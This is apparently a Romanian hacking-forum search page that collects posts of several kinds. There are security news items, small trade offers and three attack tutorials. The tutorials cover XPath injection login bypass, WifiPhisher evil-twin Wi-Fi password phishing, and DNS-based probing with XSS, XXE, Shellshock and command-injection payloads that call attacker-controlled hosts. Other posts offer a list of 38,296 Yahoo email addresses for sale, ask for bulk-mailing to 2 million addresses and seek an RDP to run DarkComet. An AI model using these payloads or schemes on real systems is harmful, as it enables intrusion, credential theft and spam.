Jump to content

Search the Community

Showing results for tags 'care'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Cumpar bitcoin cu papypal care este interesat, privat!
  2. groot

    I'm Groot

    Salut sunt groot si am ajuns aici sa fac ceea ce fac si restul utilizatirilor care au ceva vechime.
  3. Salut, As vrea ca in acest topic sa postam fiecare cateva din aplicatiile interesante din telefoanele noastre. Pentru mine cateva plicatii imi fac ziua mai usoara la munca si ajung acasa mult mai relaxat. Acestea sunt Spotify, Hearthstone,Duet si Water your body(aplicatie care te anunta periodic sa bei apa) Alte aplicatii care le folosesc si mi se par utile (pt mine ) sunt Google Keep, After Ship(awb tracking) si inca vreo 2-3 care nu merita mentionate pt ca sunt arhicunoscute. As vrea sa vad ce aplicatii folositi pentru ca fiind o comunitate tech savvy sunt sigur ca folositi aplicatii foarte interesante. Mentionati si telefonul daca are vreo relevanta.
  4. Una dintre fricile utilizatorilor de laptop-uri cu webcam incorporat este aceea de a fi spionati fara stirea lor tocmai prin intermediul acelui web-cam, atunci cand folosesc computerele personale. Din pacate pentru acestia, frica lor nu este chiar fara temei, avand in vedere ca de-a lungul anilor au existat tot felul de malware-uri care au reusit sa faca fix acest lucru: sa spioneze utilizatorii Windows prin intermediul camerelor web conectate la sistem. Iar vestea si mai proasta este ca in prezent un astfel de malware a reusit sa infecteze peste jumatate de milion de computere in intreaga lume si continua sa-si faca de cap cu vulnerabilitatile utilizatorilor BlackShades Remote Access Tool (sau pe scurt Blackshades RAT) este un tip de malware care le permite hackerilor sa fure datele personale ale utilizatorilor cu computere infectate, sa intercepteze tastele folosite si sa foloseasca webcam-urile computereleor pentru a inregistra utilizatorii fara stirea acestora. In plus, BlackShades poate fi folosit pentru a cripta si a bloca fisierele de pe computerele infectate pentru ca apoi sa pretinda o anumita suma de bani pentru deblocarea acestora. Din 2012 si pana in prezent, cateva mii de persoane rau intentionate au cumparat acest malware, BlackShades RAT generand venituri de peste 3500$. Din fericire, unul dintre programatorii malware-ului, Michael Hogue, care a pledat vinovat in New York dupa arestarea sa din 2012, coopereaza cu FBI-ul pentru a opri raspandirea acestuia. Celalalt co-creator al Blackshades, Alex Yucel, a fost arestat in Moldova in Noimebrie 2013, si urmeaza sa fie extradat in SUA pentru proces. De asemenea, FBI a anuntat ca au mai fost arestati si alti 97 de utilizatori ai malware-ului, banuiti si ca ar distribui copii ale acestuia pentru preturi variind intre 40$ si 100$. Pretul scazut al malware-ului a facut ca acesta sa devina popular printre hackeri si, de la lansarea acestuia online, au aparut mai multe variante ale acestuia care circula pe internet sub alte nume. Informatiile stranse pana acum de FBI au condus luna aceasta la peste 359 de locuinte in peste 13 tari europene (Austria, Belgia, Marea Britanie, Croatia, Danemarca, Estonia, Finlanda, Franta, Germania, Italia, Moldova, Olanda si Elvetia), de unde politia a confiscat arme, droguri, bani si peste 1000 de dispozitive de stocare date. Intr-o investigatie anterioara relationata cu BlackShades, politia germana a arestat un tanar de 18 ani care a folosit acest malware pentru a inregistra si fotografia peste 2000 de femei aflate in fata camerelor web, fara stirea acestora.
  5. Kaspersky Lab a organizat o dezbatere despre cyberbullying in cadrul Mobile World Congress 2015 Un studiu realizat de Kaspersky Lab in parteneriat cu B2B International arata ca aproximativ 22% dintre parinti nu verifica tipul de continut virtual pe care il acceseaza copiii lor, iar 48% dintre acestia sunt ingrijorati cu privire la agresiunile cibernetice la care pot fi expusi cei mici. Kaspersky Lab a organizat o dezbatere in cadrul evenimentului Mobile World Congress 2015, pentru a analiza aceasta situatie. Initiativa face parte parte dintr-o campanie globala pentru educarea si asistarea copiilor si a parintilor in lupta impotriva cyberbullying-ului (agresiunilor din mediul cibernetic). „Internetul are multe beneficii, insa, din pacate, ofera posibilitatea unor utilizatori sa-si expuna trasaturile daunatoare, iar cyberbullying-ul a devenit o problema la scara larga,” a avertizat Eugene Kaspersky, Chairman si CEO Kaspersky Lab. „Pentru victime, impactul psihologic poate fi serios si durabil. Probabil ca nu exista o solutie strict tehnologica, insa trebuie sa discutam despre toate aceste lucruri si sa-i informam atat pe parinti, cat si pe copii, pentru a le permite sa se bucure de toate lucrurile bune pe care le ofera internetul,” a declarant Eugene Kaspersky. „Cyberbullying-ul si, in general, toate tipurile de agresiuni afecteaza copiii si trebuie sa fie abordate dintr-o perspectiva holistica, implicand in discutie atat copiii si adolescentii, cat si parintii si profesorii,” a comentat Janice Richardson, Senior Advisor in cadrul European Schoolnet si Co-fondator Insafe. „Problema de baza este ca instrumentele noastre de comunicare au evoluat mult in ultimele decenii, insa tehnicile de utilizare nu au progresat in aceeasi masura,” a avertizat Janice Richardson. Cercetarea Kaspersky Lab arata si ca intentiile bine intentionate ale adultilor de a oferi spatiu privat copiilor pot, de fapt, sa ii faca pe acestia mai vulnerabili la hartuirile si abuzurile din mediul online. De exemplu, doar 19% dintre parinti afirma ca ii au pe cei mici in listele de prieteni sau ca ii urmaresc pe retelele sociale si doar 39% monitorizeaza activitatile online ale celor mici. 38% dintre parinti au discutat cu copiii despre amenintarile din mediul virtual, procent care poate reflecta o lipsa de incredere si intelegere. Studiul arata ca cei mici sunt reticenti in a marturisi ca sunt victime ale agresiunilor online: 25% dintre parintii ai caror copii au fost agresati in mediul virtual spun ca au aflat acest lucru dupa mult timp. Datele sunt ingrijoratoare deoarece abuzul in mediul virtual se poate extinde rapid si in viata reala, dupa cum au descoperit 26% dintre parintii afectati. Impactul emotional pe termen lung poate fi semnificativ, iar parintii trebuie sa fie informati pentru a face demersurile necesare ca sa opreasca cyberbullying-ul. Studiul Kaspersky Lab arata ca 44% dintre parintii care au aflat ca cei mici sunt agresati au intervenit – in timp ce peste jumatate dintre parinti nu au luat masuri. Poate fi dificil sa previi cyberbullying-ul, insa exista masuri simple care pot fi adoptate pentru a proteja copiii impotriva actiunilor de hartuire virtuala si de consecintele acestora. De exemplu, setarile de confidentialitate din retelele sociale permit adultilor sa ii ajute pe cei mici sa controleze care sunt utilizatorii care le pot urmari postarile sau trimite mesaje private. Setarile de control parental integrate in aplicatii si in solutiile de securitate asigura protectie si un plus de liniste. De asemenea, este important ca parintii sa comunice cu copiii lor si sa le explice importanta protejarii informatiilor confidentiale precum adresa, numarul de telefon, scoala sau numarul cardului de credit. In plus, copiii trebuie sa inteleaga ca este important sa stabileasca ce continut distribuie caror utilizatori si unde pot cere ajutorul in cazul in care sunt agresati sau hartuiti. Mai multe informatii despre cyberbullying si sfaturi cu privire la protectia copiilor pe internet se gasesc pe portalul educational Kaspersky Lab: kids.kaspersky.com. -> Sursa: Kaspersky Lab a organizat o dezbatere despre cyberbullying in cadrul Mobile World Congress 2015
  6. Luand in considerare evolutia conceptului de Internet of Things si dezvoltarea unui alt concept – Internet of Us, Kaspersky Lab colaboreaza cu comunitatea suedeza de bio-hacking, BioNyfiken, pentru a analiza procesul de utilizare a corpurilor umane pentru accesarea internetului. In trecut, acest proces a fost subiectul filmelor de Hollywood si al romanelor stiintifico-fantastice, insa, in 2015, numarul oamenilor hibrizi se afla intr-o continua crestere. Luand in considerare directia inventiilor tehnologice si adoptarea in masa a dispozitivelor precum stimulatoarele cardiace, pompele pentru insulina, aparatele auditive si sistemele de stimulare a proceselor cognitive, tot mai multi oameni pot fi considerati partial roboti. Informatii recente descriu un nou tip de oameni hibrizi – utilizatorii care isi implanteaza cipuri nu din motive medicale, ci pentru eficientizarea activitatilor zilnice precum controlul incuietorilor usilor, achizitiile online si accesarea computerelor printr-o miscare a mainii. Astfel, capacitatea de stocare a datelor personale prin intermediul implanturilor ridica noi probleme de securitate. BioNyfiken, o comunitate suedeza de bio-hacking, ia masuri pentru normalizarea acestui fenomen pentru a-l implementa la scara larga. Comunitatea BioNyfiken considera ca un implant nu este diferit de cercei sau de tatuaje si este de parere ca din ce in ce mai multi utilizatori vor opta pentru implanturi cu compatibilitate NFC (Near Field Communication) pentru a stoca serii de informatii. „Conceptul Internet of Things presupune dezvoltarea de produse pentru a le pune rapid pe piata,” spune Patrick Mylund Nielsen, Senior Security Researcher la Kaspersky Lab. „Utilizatorii fie se gandesc tarziu la securitatea dispozitivelor, fie nu se gandesc deloc. Desi bio-hacking-ul a fost un subiect al romanelor stiintifico-fantastic pentru o perioada indelungata, acestea nu au analizat si implicatiile: Ce se intampla atunci cand informatiile confidentiale sunt stocate pe un cip implantat? Poate cineva deveni o copie a noastra daca ne atinge? Am putea fi urmariti unde mergem? Cuvantul „nyfiken” inseamna curios si noi suntem curiosi sa aflam raspunsurile la aceste intrebari,” incheie Patrick Mylund Nielsen. „Tehnologia se intampla acum,” spune Hannes Sjoblad, unul dintre fondatorii BioNyfiken. „Observam cresterea comunitatii de utilizatori care experimenteaza prin implanturi care le permit sa indeplineasca anumite cerinte zilnice rapid si usor – accesul in cladiri, deblocarea dispozitivelor personale fara a introduce un cod PIN si accesul la numeroase date stocate. „Consider ca evolutia acestei tehnologii este un alt moment important in istoria interactiunii dintre oameni si computere, similar lansarii primelor computere cu Windows sau primelor ecrane cu tehnologie screen. Fiecare dispozitiv cu care ne identificam, fie ca este o cheie sau o cartela electronica, este inca un lucru care ne influenteaza vietile,” incheie Hannes Sjoblad. „Consideram ca este important sa lucram cu experti de top in securitate cibernetica pentru ca inteleg tehnologia si ne ajuta sa identificam riscurile. Kaspersky Lab este un partener de cercetare ideal pentru BioNyfiken. Expertii Kaspersky Lab nu doar ca au pregatire de top, ci au fost si initiatorii cercetarilor inovatoare cu privire la tehnologiile noi,” mai adauga Hannes Sjoblad. „Abia asteptam sa lucram cu expertii Kaspersky Lab intr-un proiect deschis de cercetare care sa exploreze vulnerabilitatile acestor cipuri in activitatile zilnice ale utilizatorilor, pentru a putea identifica modalitati de rezolvare in cazul in care acestea exista.” In plus fata de cercetarea in parteneriat cu BioNyfiken, Kaspersky Lab va organiza evenimente impreuna cu comunitatea de bio-hacking in Suedia si pe teritoriul Europei pentru a discuta aspectele referitoare la securitatea cibernetica si la spatiul privat. Exista numeroase cladiri hi-tech in Suedia, precum Epicenter care dezvolta business-uri care utilizeaza implanturi NFC in mod regulat pentru activitati variate, inlocuind alte dispozitive. „Eu prefer sa nu imi implantez un cip,” spune Eugene Kaspersky, Chairman si CEO la Kaspersky Lab. „Insa, inteleg evolutia tehnologiei si cred ca vor exista utilizatori care isi vor asuma riscuri, vor testa limitele tehnologiei si vor experimenta pe propriile corpuri. Mi-ar placea sa faca asta constienti de implicatii si sa tina cont de siguranta inainte, nu dupa ce s-a intamplat ceva, cum este cazul de cele mai multe ori,” comenteaza Eugene Kaspersky. „Imi pare foarte bine ca BioNyfiken a ales sa lucreze cu noi pentru a analiza implicatiile de securitate legate de utilizarea corpurilor umane pentru accesarea internetului. Poate ca expertii Kaspersky Lab nu vor descoperi nicio vulnerabilitate, insa, daca oamenii vor avea cipuri NFC in corpuri, as vrea sa ma asigur ca am analizat atent orice posbilititate,” mai adauga Eugene Kaspersky. -> Sursa: Telefoane conectate, case conectate, masini conectate… oameni conectati
  7. Am 4.5 $ paypal. Vreau un RDP din RO care sa-mi fie accesibil o saptamana. PS: Sa nu ma trezesc ca ma da ala afara dupa 2 zile... Vreau sa administrez un DarkComet de acolo. Atat.
  8. Introducere Aplicatiile web folosesc foarte mult bazele de date pentru a aduna datele necesare si ale folosii la buna lor functionare . De multi ani, bazele de date relationale sunt tehnologia preferata pentru gestionarea datelor, dar in ultimul timp, au inceput sa iasa solutii organizate in structuri XML . Daca DB-urile relationale erau interogate folosind limbajul SQL, DB-urile XML folosesc XPath pentru a efectua query . Asa cum in limbajul SQL exista vulnerabilitati, exista si in XPath . In particular XPath injection, care ne permite sa injectam sintaxe XPath in internul request-ului, pe care aplicatia trebuie sa-l interpreteze, permitandu-ne astfel sa folosim interogari ad-hoc, de exemplu, by-pass al mecanismelor de autentificare, sau accesul la informatii care nu ar trebuii sa fie citite . Structura unei baze XML Pentru a intelege cum functioneaza query XPath, sa ne imaginam o baza de date care contine date de autentificare ( username, password si nivelul de acces ) . <?xml version="1.0" encoding="ISO-8859-1"?> <auth> <user> <username>admin</username> <password>Password</password> <account>admin</account> </user> <user> <username>guest1</username> <password>Passosp1t31</password> <account>guest</account> </user> <user> <username>guest2</username> <password>Passosp1r32</password> <account>guest</account> </user> </auth> Sa specificam mai in detaliu ce semnificatie au tagurile folosite . <auth>, este elementul radacina si il putem considera numele pe care vrem sa-l dam DB-ului nostru . <user>, defineste prima separare de elemente al aceluia intreg, intr-o baza de date relationala ar corespunde cu numele tabelului . <username>, <password> si <account>, definec inregistrarile relative al fiecarui <user> Putem presupune ca un utilizator poate accesa DB-ul prin intermediul front-end, care este programat intr-un oarecare limbaj web compatibil . Prin intermediul acestui instrument va fi posibil sa introducem date, sa le verificam si asa vom garanta accesul la DB, asta in posibilitatile permisiilor . XPath injection In momentul verificarii credentialelor accesului, va fi generat un string asemanator acestuia : //user[username/text()='USERNAME' and password/text()='PASSWORD']/account/text() Aici imput-ul utilizatorului, este reprezentat de string-ul USERNAME si PASSWORD . Daca aplicatia care interpreteaza codul XPath, nu filtreaza amandoua string-urile ( adica nu sterge '' ) atunci aplicatia este expusa unei vulnerabilitati de tip XPath injection . Pentru inceput trebuie sa se verifice injectia de fazabilitate, putem face asta punand un singur apex . Facand asa, serverul va returna o eroare de sintaxa si asa vom fii destul de sigur ca aplicatia este expusa unei vulnerabilitati . Sa vedem acum, cum putem sa profitam . Sa presupunem sa string-urile precedente ( USERNAME si PASSWORD ) sunt valorificate ca aici : USERNAME || ‘ or ‘a’='a PASSWORD || ‘ or ‘a’='a Cu aceste valori, query-ul care va fi rezultat va fi : //user[username/text()='' or 'a'='a' and password/text()='' or 'a'='a']/account/text() Situatia prezentata in acest tip de query va returna in totdeauna pozitiv ( TRUE ), ce va garanta accesul la DB, fara ca utilizatorul sa fii introdus credentiale valide . Daca nu cunoastem nimic despre structura interna al DB-ului XML, sau aplicatia nu furnizeaza nici un mesaj despre eroare, putem folosii un atac de tip Blind Xpath injection . Blind XPath injection In urma datelor pe care le cautam, este posibil sa mai obtinem si functii interne al limbajului XPath si asa vom avea mult mai multe informatii despre structura DB-ului XML . stringlenght() Cu aceasta functie putem extrage lungimea unui string ( sir ) de orice fel din teriorul bazei de date, ca in exemplu . stringlenght(//user[position()=1]/child::node()[position()=2]) In acest caz, vom obtine lungimea string-ului al doilea al primului utilizator . Putem chiar sa verificam daca lungimea este egala cu o valoare determinata . stringlength(//user[position()=1]/child::node()[position()=2]) = 6 Rezultatul va fii TRUE sau FALSE . substring() Putem extrage valoarea continuta in internul unui camp al DB-ului ca in exemplu : substring((//user[position()=1]/child::node()[position()=2]),1,1) In acest fel am obtinut primul caracter al username-ului . Pe langa asta, putem controla daca string-ul de output este egal cu o valoare determinata . substring(//user[position()=1]/child::node()[position()=2]),1,1) = "a" Si in acest caz rezultatul valorii este unu boolean . count() Aceasta functie este aceea care ne permite sa obtinem numarul de noduri in internul structurii . count(//user/child::node()) Si aici putem verifica manual, specificand o valoare si obtinand inca un TRUE sau FALSE . count(//user/child::node()) = 1 Cu aceste trei simple functii, suntem deja in gradul de a explora datele continute de baza de date . Evident procesul de blind injection este lung daca va fii facut manual, dar tool-uri cum ar fii " BurpSuite ", ne permit sa obtinem mult mai rapid rezultate . Prevenire ( Prevention ) Vulnerabilitatile de tip XPath se pot evita intr-un mod analog, ca si in cazul unei SQL injection : Tratand toti input-tii, care previn de la utilizator ca nesiguri si sa aplicam filtre asupra lor . Cand se aplica un filtru input-ului utilizatorului, sa verificam coectitudinea tipului de date, lungimea, formatul si continutul . De exemplu se poate folosii o expresie regulara pentru a controla prezenta tag-uriloe XML si a caracterelor speciale . Intr-o aplicatie " client-server ", sa efectuam controale si pe latura client si pe latura server . Sa facem mereu teste pe aplicatie inanite de a o produce . O alta tehnica buna de prevenire si corectare a vulnerabilitatilor de tip injection este PARAMETRIZAREA . In generam pentru a garanta un nivel de siguranta, este bine sa aplicam filtre urmatoarelor tipuri de caractere : < > / ' = " * ? : ( ) Sursa tutorial
  9. Salut, am o lista de 38296 toate @Yahoo.com cu care nu am ce face. Ofera careva vreun leu pe ele? PS: Nu am si parolele, doar lista de mailuri. Astept oferte daca le vrea cineva.
  10. M-am gandit sa ma apuc sa lucrez ca freelancer si vroiam sa intreb daca este cineva pe aici care lucreaza pe freelancer.com. Merge treaba sau preiau indienii totul ?
  11. Salut, as dori sa stiu un soft / site (free sau cu plata) de pe care as putea sa trimit un numar mare de mailuri, aproximativ 2 milioane, in scopuri personale. Vreau sa aiba acelasi text, acelasi subiect. Am lista de mailuri din care foarte multe sunt active.
  12. Ma gandesc ca ar fi bine ca fiecare membru al forumului sa aiba un titlu sugestiv in functie de ce posteaza. Titlu care sa NU poata fi modificat de catre el personal. Ceva de genul: 1. News poster (Cei ca @wirtz ) 8. Moderator/Super Moderator/ Admin / Owner / VIP 9. Newbie (Cel nou venit pe forum si/sau cel care nu are destule postari pentru a fi clasificat in vreo categorie.) 10. Hater (Cei carora le place sa dea dislike cat mai des si indiferent la ce anume, doar ca sa nu fie ei cei cu cele mai multe dislike-uri primite.)
  13. Introducere WifiPhiser, este un tool creeat in Python si este open source ( cu licenta MIT ), toolul il gasim pe : GitHub . Acest tool fiind creeat in 08 '14, astazi fiind un proiect destul de avansat, poate fii folosit de persoanele mai putin cunoscatoare . Este vorba de un program automatizat pentru efectuarea atacurilor de tip phishing contra retelelor wireless, in scopul obtionerii parolelor . Fiind catalogat ca instrument de inginerie sociala ( social engineering ), nu executa atacuri de tip bruteforce impotriva retelelor, acest tool pacaleste utilizatorul sa scrie parola retelei ( Access Point ) . In acest tutorial vom vedea in detaliu cum functioneaza . Cum functioneaza : WifiPhiser, foloseste o tehnica numita Evil Twin ( Geamanul Malefic ), adica el ia forma acces point-ului victimei . Dupa care el va porni un atac care va deconecta victima complet de la internet si va prelua controlul intregii conexiuni . Atacul are trei parti : Victima va fii deconectata de la reteaua wireless . Este vorba de un atac pe care noi mult probabil l-am mai folosit cu toolul aircrack-ng, prin care atacatorul trimite pachete de date care cauzeaza Denial of Service ( DoS ), fortand in asa fel ca, toate dispozitivele conectate la retea sa piarda acea conexiune . Acest tip de atac mai e cunoscut sub termenul de Jamming . Dispozitivul victimei se conecteaza la access point-ul atacatorului . O daca ce victima a fost constransa sa se deconecteze dupa ce noi am executat atacul precedent, un calculator sau un telefon, au abilitatea de a se reconecta la retea automat, dar de data aceasta, reteaua noua va fii aceea creeata de geamanul malefic . WifiPhiser, are un server DHCP, care furnizeaza adrese IP ( tinand locul unui router adevarat ) . Acum victima fiind conectata la "reteaua" noastra, o putem numii " man-in-the-middle", adica este sub controlul nostru ( al atacatorului ) . Victima va naviga pe o pagina web falsa . In aceasta ultima faza, orice site va accesa victima noastra, va fii furnizata in locul site-ului o pagina care va cere parola retelei wireless pentru a face un upgrade firmware-ului ( bine inteles aceasta este pagina atacatorului de phishing ) . O data ce victima scrie parola si apasa sumbit, aceasta va fii trimisa atacatorului . Folosire Pentru a puta folosi WifiPhisher, avem nevoie de 2 placi wireless, una cu capacitatea de a injecta . In acest exemplu vom folosii Alfa, iar placa interna al laptopului ( chipset Atheos ) . Teste urmatoare au fost facute pe Ubuntu, dar pot fii facute foarte usor si pe alte versiuni de Linux . Vom downloada WifiPhisher de pe GitHub, folosind urmatoarea comanda . git clone https://github.com/sophron/wifiphisher.git Vom rezolva mici deranjamente, instaland python-scapy si hostapd : sudo apt-get install python-scapy hostapd Inainte de a deschide toolul, sa ne uitam la parametri principali . Parametru || Descriere -m || Specifica numarul maxi de clienti pe care sa ii deconecteze in prima faza a atacului . -t || Specifica intervalul de timp pentru trimiterea pachetelor care ajuta la deconectare . Default, va utiza toata puterea placi de retea . Daca veti primii eroare de la python-scapy, puteti sa setati pachetele ( -t .00001 ) . -d || Sare peste prima faza al atacului, adica deconectarea dispozitivelor, astfel va creea doar un acces point geaman . -a || Va specifica adresa MAC, aici va trebuii sa luam manual MAC-ul tintei si sa-l specificam cu ajutorul acestui parametru . -jI || Selectioneaza manual interfata placii wireles, care se va ocupa cu Jamming . -aI || Selectioneaza manual interfata placii wireles care va devenii access-point-ul geaman . Pentru lista completa de parametri, folositi urmatoarea comanda : sudo python wifiphisher.py --help In sfarsit, purcedem, deschidem WifiPhisher : sudo python wifiphisher.py -jI wlan1 -aI wlan0 -a 88:53:2e:00:00:53 Aici " wlan1 ", este placa Alfa, " wlan0 ", este placa Atheos, si cu " -a " am specificat adresa MAC a tintei . Prima data ni se va arata toate retelele vizibile in jurul nostru . Pentru a selectiona o tinta (target), vom folosii CTRL+C si vom scrie numarul asociat acesteia ca in exemplu : Acum nu trebuie sa facem nimic, decat sa asteptam . Ni se va arata o noua fereastra, aceasta fiind divizata in 3 parti, urmand cu strictete fazele mai sus mentionate : Jamming, DHCP si request-uri HTTP : Acum dupa toate astea, victima, de fiecare data cand va vrea sa navigheze pe un site, ii va aparea acesta pagina ( pagina de phishing cu cererea parolei retelei ) : Sursa
  14. Domeniu Nume Sistem ( DNS ), este unul din instrumentele pe care le folosim foarte des pentru a naviga pe internet, acesta fiind folosit pentru a transforma o adresa WEB sau un HOSTNAME cu formatul www.numesite.com.it.ro.net.ecc intr-o adresa IP cu formatul numeric nnn.nnn.nnn.nnn . Cum o sa vedem in continuare, DNS-urile au mult mai multe functii, iar scopul acestui tutorial este acela de a vedea, cum putem efectua ENUMERARI DI DESCOPERIRI, adica cum sa citim adresele IP asociate unui domeniu si sa descoperim sub-domeniile conectate acestuia . Tipuri de DNS Inainte de a incepe cu practica, este necesar sa clarificam, care sunt principalele tipuri de DNS si campul lor de utilitate Tip de DNS || Descriere A || Transofrma un HOSTNAME intr-o adresa IPv4 AAAA || Transforma un HOSTNAME intr-o adresa IPv6 CNAME || Transforma un HOSTNAME intr-un alt HOSTNAME MX || Ne da adresa de E-mail Exchange folosita pentru trimiterea de e-mail NS || Ne da adresa NAMESERVER folosita pentru gestionarea "recordDNS" TXT || Ne ofera un sir ( string ) SRV || Service Record, folosit pentru a specifica un tip de serviciu, poate contine HOSTNAME-ul si PORT-ul pe care serviuciu lucreaza, foarte des folosit pentru VoIP PTR || Pointer Record, folosit pentru a obtine un HOSTNAME pe IP Pe pagina de Wikipedia, este disponibila lista completa tuturor tipurilor de DNS record . Enumerare si descoperire Tool-ul care ne permite sa facem chemari de tip DNS ( request ) este dig . Sa vedem cum putem sa chemam tipul de DNS " A " al domeniului HTML.it, folosind serverul DNS google ( 8.8.8.8 ) : dig @8.8.8.8 -t A html.it Dar daca vom vrea sa obtinem toate topurile de DNS record, fara sa specificam ce vrem pas cu pas, vom folosii : dig @8.8.8.8 -t ANY html.it Informatiile primite de la dig, pot fii prea putine si incomplete, putem insa sa obtinem mai multe informatii folosind dnsdict6 . dnsdict6 -4 -d -S html.it Comenzile precendente : Paramentrul " -4 ", efectueaza enumerarea si pe protocolul IPv4 Paramentrul " -d ", ne arata informatii si indrumari IPv6 Paramentrul " -S ", cere efectuarea enumerari pe tipul de DNS SRV dnsdict6 contine default un dictionar de aproximativ 1500 de cuvinte cheie, care sunt utilizate ( cum se vede in iesire precendenta ( output )), pentru a gasii domenii de nivelul 3 ( numite sub-domenii ) . Este posibil daca vrem sa specificam un dictionar extern . dnsdict6 -4 -d -S html.it /home/simone/dizionari/dns_presonal.txt Acum ca am obtinut o lista mai mult sau mai putin completa de sub-domenii putem sa trecem la folosire de " dnsenum ", o comanda care in afara ca probeaza din dictionar cuvintele cheie, efectueaza o cautare direct pe Google, pentru a ne da rezultate mult mai exacte . dnsenum --dnsserver 8.8.8.8 --enum html.it Comenzile precendente : Parametrul " -dnsserver ", specifica pe care server sa mergem si sa efectual request-urile Parametrul " -enum ", porneste varie tipuri de enumerare, dintre care, dictionar, cautare Google si rezultate Whols . Pe langa toate astea, este posibil sa obtinem o lista cu sub-domenii cu ajutorul Google ( excluzand rezultatele care contin WWW, utilizand stringul ca in exemplu : site:html.it -www Incest puct in care suntem ajunsi avem mult mai multe informatii despre domeniul pe care il analizam . Putem strange acum cuvintele cheie pe care le-am folosit, pentru a proteja domeniul de atacurile de tip " Man-in-the-Middle" sau transferuri frauduloase . Acest sistem de protejare se numeste DNSSEC . dnsrecon -d verisigninc.com Paramentrul " -d ", ne permite sa specificam domeniul asupra caruia vrem sa efectual enumerarea . Acum, avem destule informatii pentru a face descoperirea ( discovery ) : este vorba de procesul de cautare prin adresele IP ( vecine ), cautand alte nume DNS, care pot face referire la tinta noastra ( target ) . dnsrecon -r 151.1.244.200/24 Parametrul " -r ", efectueaza un " Reverse Lookup " . Range-ul ( Gama ), este specificata cu un netmask, este request-ul care este trimis serverului DNS de tip PTR . Pentru a face reversing adreselor IPv6, putem folosii dnsrevenum6 : dnsrevenum6 8.8.8.8 2001:41d0:1:ad64:1::/48 In precedenta comanda, primul parametru este adressa serverului DNS ( in acest caz Google ) si al doilea parametru este range-ul, specificat cu netmask /48, al adresei IPv6 . Toate informatiile adunate, provin din servicii publice, deci sunt consultabile de oricine, nu am facut nici o ilegalitate pe durata procesului de enumerare si descoperire . DNS : Functionarea si verificarea acestuia de vulnerabilitati Parcursul unui request DNS . Imaginea de mai sus, a fost selectata din prezentarea tinuta de Ron Bowes ( angajat Google ), tinuta la DerbyCon 2014, unde explica exact cum functioneaza un request DNS . Primul dispozitiv pe care il vom interoga va fii router-ul nostru . In cazul in care nu s-au facut request-uri pana acum, request-ul va ajunge la serverul DNS configurat in internul router-ului . Daca nici Google nu este abil pentru a rezolva adresa, va face intrebari root-serverelor (servere care sunt responsabile pentru fiecare domeniu de nivel 1 in parte ) . Daca nici aceste ultime masuri nu gasesc raspunsul, vor face un tur de request-uri la autohoritative server, care este un server DNS sub controlul nostru . In acest mod vom putea raspunde originalului request DNS cu valoarea aleasa de noi . Trebuie sa stim sa serviciul DNS este lasat deschis in majoritatea parilor de server, daca nu ar fi asa, nu ar mai exista posibilitatea ca serverul sa comunice cu toti la nivel global . Acesta ne permite sa comunicam cu serverul, reusind sa trecem peste eventuali Firewall sau Intrusion Prevention System ( IPS ) . Noi metode de atac folosind DNS-uri, verificarea de vulnerabilitati Intr-un assessment in blackbox este greu sa intelegem cum datele vin in internul sistemului . Cu ajutorul DNS-ului putem sa urmarim sau cel putin sa intelegem daca datele noastre sunt acceptate de terzi . Cross-Site Scripting ( XSS ) In perioada 2010 si 2012 au fost efectuate teste pe trei mari portale de Whols surprinzand, ele fiind vulnerabile atacurilor XSS, atacatorul crease un record DNS de tip TXT cu un cod similiar acestuia . <script src="http://siteulnostru/evil.js"></script> Folosind alte tipuri de DNS, cum ar fi, CNAME, MX sau PTR, ar fi fost mult mai greu, vazand ca tipurile de record precedente nu permit folosirea de spatii sau ghilimele ca in exemplu . <script/src='http://siteulnostru/evil.js"></script> Atacatorul a reusit sa injecteze un cod malitios permanent, care putea afecta orice vizitator . SQL injection Exista multe functii PHP sau ASP, care permit sa preluam valoarea unui record DNS . Aceste date pot fii folosite in continuare si utilizate intr-un query SQL fara a fi filtrat . Sa vedem cum putem exploata acest tip de vulnerabilitate, folosindune de un exemplu dat de Ron Bowse facut in PHP . Atacatorul are posibilitatea de a modifica query-ul SQL, obtinand parola unui alt user, utilizand un record DNS de tip TXT ca in exemplu . Acesta fiind un singur exemplu unde utilizatorul stie codul sursa al aplicatiei . Intr-un caz real este greu sa afli adevaratul query SQL daca nu stii cum a fost scris . XML External Entity ( XXE ) Putem verifica daca un sistem este vulnerabil XXE introducand in internul fisierului sau a query XML, un cod ca cel ce urmeaza : ]<!ENTITY xxe SYSTEM "http://notexistingname.ourserver.org" >]> <user>&xxe;</user> Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " notexistingname ", vom stii ca sistemul este vulnerabil actiunilor externe . In acest punct ajunsi putem sa incepem sa adunam fisiere locale, cum ar fii /etc/passwd . ShellShock Una dintre metodele de invazie pentru a verifica prezenta unui bug Bash ( ShellShock ), este folosirea rezolutiei DNS cu ajutorul nslookup, comanda recunoscuta pe Windows, Linux si Mac . Se poate imposta un user-agent si sa asteptam ca vin request-urile . () { test;};nslookup shellshocked.ourserver.org Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " shellshocked ", vom sti ca aplicatia web foloseste un script cu o versiune vulnerabila de Bash . Putem deci sa executam orice alta comanda in locul simplei nslookup . Remote command execution ( RCE ) Ca in exemplul de Shellshock putem executa nslookup, pentru a verifica vulnerabilitatile de tip RCE, pentru a face asta sunt o gama larga de trucuri ca in exemplu : ;nslookup shell.ourserver.org `nslookup shell.ourserver.org` |nslookup shell.ourserver.org $(nslookup shell.ourserver.org) Ca in exemplele precedente, cand vom 